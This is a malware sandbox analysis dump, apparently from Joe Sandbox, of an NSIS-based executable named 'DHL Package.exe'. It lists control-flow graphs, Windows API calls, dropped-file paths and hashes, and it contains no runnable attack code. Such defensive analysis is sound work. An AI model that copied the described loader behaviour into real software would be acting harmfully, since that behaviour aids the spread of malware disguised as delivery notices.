                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\peggle), ref: 00403C12
                                                                                                  • Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F
                                                                                                • RegisterClassW.USER32(004291C0), ref: 00403C4F
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C67
                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C9C
                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403CD2
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403CFE
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403D0B
                                                                                                • RegisterClassW.USER32(004291C0), ref: 00403D14
                                                                                                • DialogBoxParamW.USER32(?,00000000,00403E58,00000000), ref: 00403D33
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: "C:\Users\user\Desktop\DHL Package.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\peggle$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                • API String ID: 1975747703-2256777239
                                                                                                • Opcode ID: b857402c7fb4dacd26e5b8e2fc16868a27ef5d67229386ec777c0342ebdc81dd
                                                                                                • Instruction ID: a24d2e849b10ad8e1ed533e9d37a820f5d0e6b510d4fa7617ff35d8301a60578
                                                                                                • Opcode Fuzzy Hash: b857402c7fb4dacd26e5b8e2fc16868a27ef5d67229386ec777c0342ebdc81dd
                                                                                                • Instruction Fuzzy Hash: E761B670244600BAD720AF669D45E2B3A7CEB84B0AF40457FFD41B62E2DB7D5912CA2D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 369 403015-403063 GetTickCount GetModuleFileNameW call 405ed1 372 403065-40306a 369->372 373 40306f-40309d call 4063db call 405cfc call 4063db GetFileSize 369->373 374 403245-403249 372->374 381 4030a3 373->381 382 403188-403196 call 402fb1 373->382 383 4030a8-4030bf 381->383 388 403198-40319b 382->388 389 4031eb-4031f0 382->389 385 4030c1 383->385 386 4030c3-4030cc call 403431 383->386 385->386 395 4031f2-4031fa call 402fb1 386->395 396 4030d2-4030d9 386->396 391 40319d-4031b5 call 403447 call 403431 388->391 392 4031bf-4031e9 GlobalAlloc call 403447 call 40324c 388->392 389->374 391->389 415 4031b7-4031bd 391->415 392->389 420 4031fc-40320d 392->420 395->389 399 403155-403159 396->399 400 4030db-4030ef call 405e8c 396->400 404 403163-403169 399->404 405 40315b-403162 call 402fb1 399->405 400->404 418 4030f1-4030f8 400->418 411 403178-403180 404->411 412 40316b-403175 call 4068bd 404->412 405->404 411->383 419 403186 411->419 412->411 415->389 415->392 418->404 424 4030fa-403101 418->424 419->382 421 403215-40321a 420->421 422 40320f 420->422 425 40321b-403221 421->425 422->421 424->404 426 403103-40310a 424->426 425->425 427 403223-40323e SetFilePointer call 405e8c 425->427 426->404 428 40310c-403113 426->428 431 403243 427->431 428->404 430 403115-403135 428->430 430->389 432 40313b-40313f 430->432 431->374 433 403141-403145 432->433 434 403147-40314f 432->434 433->419 433->434 434->404 435 403151-403153 434->435 435->404
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00403026
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL Package.exe,00000400,?,00000007,00000009,0000000B), ref: 00403042
                                                                                                  • Part of subcall function 00405ED1: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\DHL Package.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                                                  • Part of subcall function 00405ED1: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL Package.exe,C:\Users\user\Desktop\DHL Package.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 0040308E
                                                                                                • GlobalAlloc.KERNELBASE(00000040,0000000B,?,00000007,00000009,0000000B), ref: 004031C4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                • String ID: "C:\Users\user\Desktop\DHL Package.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL Package.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                • API String ID: 2803837635-3408820850
                                                                                                • Opcode ID: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
                                                                                                • Instruction ID: a1180c22f2f56a455fdba696775536d8b2bad2e91b267b1d20a8a943b96b17b0
                                                                                                • Opcode Fuzzy Hash: 286758f993afdfee37dc791dabadca02854f419a97292f6ff8ee6bd162e70e0f
                                                                                                • Instruction Fuzzy Hash: DD51E571904204ABDB209F64DD81B9E7EACEB05316F20407BF905BA3D1C77D8E81876D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 436 406418-406423 437 406425-406434 436->437 438 406436-40644c 436->438 437->438 439 406452-40645f 438->439 440 406664-40666a 438->440 439->440 441 406465-40646c 439->441 442 406670-40667b 440->442 443 406471-40647e 440->443 441->440 445 406686-406687 442->445 446 40667d-406681 call 4063db 442->446 443->442 444 406484-406490 443->444 447 406651 444->447 448 406496-4064d4 444->448 446->445 452 406653-40665d 447->452 453 40665f-406662 447->453 450 4065f4-4065f8 448->450 451 4064da-4064e5 448->451 456 4065fa-406600 450->456 457 40662b-40662f 450->457 454 4064e7-4064ec 451->454 455 4064fe 451->455 452->440 453->440 454->455 460 4064ee-4064f1 454->460 463 406505-40650c 455->463 461 406610-40661c call 4063db 456->461 462 406602-40660e call 406322 456->462 458 406631-406639 call 406418 457->458 459 40663e-40664f lstrlenW 457->459 458->459 459->440 460->455 466 4064f3-4064f6 460->466 472 406621-406627 461->472 462->472 468 406511-406513 463->468 469 40650e-406510 463->469 466->455 473 4064f8-4064fc 466->473 470 406515-406533 call 4062a9 468->470 471 40654e-406551 468->471 469->468 479 406538-40653c 470->479 477 406561-406564 471->477 478 406553-40655f GetSystemDirectoryW 471->478 472->459 476 406629 472->476 473->463 480 4065ec-4065f2 call 40668a 476->480 482 406566-406574 GetWindowsDirectoryW 477->482 483 4065cf-4065d1 477->483 481 4065d3-4065d7 478->481 484 406542-406549 call 406418 479->484 485 4065dc-4065df 479->485 480->459 481->480 487 4065d9 481->487 482->483 483->481 486 406576-406580 483->486 484->481 485->480 490 4065e1-4065e7 lstrcatW 485->490 492 406582-406585 486->492 493 40659a-4065b0 SHGetSpecialFolderLocation 486->493 487->485 490->480 492->493 497 406587-40658e 492->497 494 4065b2-4065c9 SHGetPathFromIDListW CoTaskMemFree 493->494 495 4065cb 493->495 494->481 494->495 495->483 498 406596-406598 497->498 498->481 498->493
                                                                                                APIs
                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406559
                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,?,0040547A,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000), ref: 0040656C
                                                                                                • SHGetSpecialFolderLocation.SHELL32(0040547A,00418EC0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,?,0040547A,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000), ref: 004065A8
                                                                                                • SHGetPathFromIDListW.SHELL32(00418EC0,Call), ref: 004065B6
                                                                                                • CoTaskMemFree.OLE32(00418EC0), ref: 004065C1
                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065E7
                                                                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,?,0040547A,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000), ref: 0040663F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                • API String ID: 717251189-2890755401
                                                                                                • Opcode ID: 9a1e46779e3f4c632189bbfeb73c6a2e1f9e523224e90cf48f6d36dd640252de
                                                                                                • Instruction ID: 14d1193dfffb306d7d50c4759d5107437c4365ff0453e231a2932b6079d00088
                                                                                                • Opcode Fuzzy Hash: 9a1e46779e3f4c632189bbfeb73c6a2e1f9e523224e90cf48f6d36dd640252de
                                                                                                • Instruction Fuzzy Hash: 27612771A00111ABDF209F24ED40ABE37A5AF54314F12813FE943B62D0DB3E89A2CB5D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 563 40176f-401794 call 402d3e call 405d27 568 401796-40179c call 4063db 563->568 569 40179e-4017b0 call 4063db call 405cb0 lstrcatW 563->569 574 4017b5-4017b6 call 40668a 568->574 569->574 578 4017bb-4017bf 574->578 579 4017c1-4017cb call 406739 578->579 580 4017f2-4017f5 578->580 587 4017dd-4017ef 579->587 588 4017cd-4017db CompareFileTime 579->588 582 4017f7-4017f8 call 405eac 580->582 583 4017fd-401819 call 405ed1 580->583 582->583 590 40181b-40181e 583->590 591 40188d-4018b6 call 405443 call 40324c 583->591 587->580 588->587 592 401820-40185e call 4063db * 2 call 406418 call 4063db call 405a41 590->592 593 40186f-401879 call 405443 590->593 605 4018b8-4018bc 591->605 606 4018be-4018ca SetFileTime 591->606 592->578 627 401864-401865 592->627 603 401882-401888 593->603 607 402bcb 603->607 605->606 609 4018d0-4018db FindCloseChangeNotification 605->609 606->609 610 402bcd-402bd1 607->610 612 4018e1-4018e4 609->612 613 402bc2-402bc5 609->613 615 4018e6-4018f7 call 406418 lstrcatW 612->615 616 4018f9-4018fc call 406418 612->616 613->607 620 401901-402390 615->620 616->620 625 402395-40239a 620->625 626 402390 call 405a41 620->626 625->610 626->625 627->603 628 401867-401868 627->628 628->593
                                                                                                APIs
                                                                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\peggle\Dilettantkomediers,?,?,00000031), ref: 004017D5
                                                                                                  • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                                                  • Part of subcall function 00405443: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                                                  • Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                                                  • Part of subcall function 00405443: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00403385), ref: 0040549E
                                                                                                  • Part of subcall function 00405443: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll), ref: 004054B0
                                                                                                  • Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                                                  • Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                                                  • Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp$C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll$C:\Users\user\AppData\Local\peggle\Dilettantkomediers$Call
                                                                                                • API String ID: 1941528284-2794091021
                                                                                                • Opcode ID: 81c736e87224b55c3f3289638049461dc0f47c27e624ea7ea6c04df356e87e40
                                                                                                • Instruction ID: 099db37703b38b7faa9c4b3761aa4ffcdc8a6de3d1088dc1ecc91c4b2867a8b7
                                                                                                • Opcode Fuzzy Hash: 81c736e87224b55c3f3289638049461dc0f47c27e624ea7ea6c04df356e87e40
                                                                                                • Instruction Fuzzy Hash: BB41C171500118BACB10BFA5DC85DAE7A79EF41328F20423FF822B10E1C77C8A519A6E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 629 405443-405458 630 40545e-40546f 629->630 631 40550f-405513 629->631 632 405471-405475 call 406418 630->632 633 40547a-405486 lstrlenW 630->633 632->633 635 4054a3-4054a7 633->635 636 405488-405498 lstrlenW 633->636 638 4054b6-4054ba 635->638 639 4054a9-4054b0 SetWindowTextW 635->639 636->631 637 40549a-40549e lstrcatW 636->637 637->635 640 405500-405502 638->640 641 4054bc-4054fe SendMessageW * 3 638->641 639->638 640->631 642 405504-405507 640->642 641->640 642->631
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                                                • lstrlenW.KERNEL32(00403385,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00403385), ref: 0040549E
                                                                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll), ref: 004054B0
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll
                                                                                                • API String ID: 2531174081-3374124304
                                                                                                • Opcode ID: cc04cc4826fc3d3b155713b60cdeb9a5eed99eab54f27ad30d7602578aff4a07
                                                                                                • Instruction ID: 73e5e0af396a9b9ac9a9b02969ae59ee3043c4a39b1bd1f3be19a3319d016d01
                                                                                                • Opcode Fuzzy Hash: cc04cc4826fc3d3b155713b60cdeb9a5eed99eab54f27ad30d7602578aff4a07
                                                                                                • Instruction Fuzzy Hash: 14219D71900518BACB219F56DD44ACFBF79EF44350F10803AF904B62A0C7798A91DFA8

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 643 4026e4-4026fd call 402d1c 646 402bc2-402bc5 643->646 647 402703-40270a 643->647 648 402bcb-402bd1 646->648 649 40270c 647->649 650 40270f-402712 647->650 649->650 652 402876-40287e 650->652 653 402718-402727 call 40633b 650->653 652->646 653->652 656 40272d 653->656 657 402733-402737 656->657 658 4027cc-4027cf 657->658 659 40273d-402758 ReadFile 657->659 661 4027d1-4027d4 658->661 662 4027e7-4027f7 call 405f54 658->662 659->652 660 40275e-402763 659->660 660->652 664 402769-402777 660->664 661->662 665 4027d6-4027e1 call 405fb2 661->665 662->652 671 4027f9 662->671 667 402832-40283e call 406322 664->667 668 40277d-40278f MultiByteToWideChar 664->668 665->652 665->662 667->648 668->671 672 402791-402794 668->672 674 4027fc-4027ff 671->674 675 402796-4027a1 672->675 674->667 677 402801-402806 674->677 675->674 678 4027a3-4027c8 SetFilePointer MultiByteToWideChar 675->678 679 402843-402847 677->679 680 402808-40280d 677->680 678->675 681 4027ca 678->681 683 402864-402870 SetFilePointer 679->683 684 402849-40284d 679->684 680->679 682 40280f-402822 680->682 681->671 682->652 687 402824-40282a 682->687 683->652 685 402855-402862 684->685 686 40284f-402853 684->686 685->652 686->683 686->685 687->657 688 402830 687->688 688->652
                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 00402750
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                                                  • Part of subcall function 00405FB2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FC8
                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                • String ID: 9
                                                                                                • API String ID: 163830602-2366072709
                                                                                                • Opcode ID: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
                                                                                                • Instruction ID: 536e03bdd217ed40317c2037eab2912bbb9466327a1cdf3ab0e42e9fe4cfd002
                                                                                                • Opcode Fuzzy Hash: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
                                                                                                • Instruction Fuzzy Hash: 2751F975D00219EBDF20DF95CA89AAEBB79FF04304F50817BE501B62D0E7B49D828B58

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 689 405912-40595d CreateDirectoryW 690 405963-405970 GetLastError 689->690 691 40595f-405961 689->691 692 40598a-40598c 690->692 693 405972-405986 SetFileSecurityW 690->693 691->692 693->691 694 405988 GetLastError 693->694 694->692
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405955
                                                                                                • GetLastError.KERNEL32 ref: 00405969
                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040597E
                                                                                                • GetLastError.KERNEL32 ref: 00405988
                                                                                                Strings
                                                                                                • C:\Users\user\Desktop, xrefs: 00405912
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405938
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                • API String ID: 3449924974-26219170
                                                                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                • Instruction ID: dda0a131242ff184f2ccb02743bd446f17612fd9a9d8f3d2581d745ec2ea809b
                                                                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                • Instruction Fuzzy Hash: 010108B1C00219EADF009BA0C944BEFBBB4EB04364F00803AD945B6180D77996488FA9

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 695 406760-406780 GetSystemDirectoryW 696 406782 695->696 697 406784-406786 695->697 696->697 698 406797-406799 697->698 699 406788-406791 697->699 701 40679a-4067cd wsprintfW LoadLibraryExW 698->701 699->698 700 406793-406795 699->700 700->701
                                                                                                APIs
                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
                                                                                                • wsprintfW.USER32 ref: 004067B2
                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067C6
                                                                                                Strings
                                                                                                Memory Dump Source
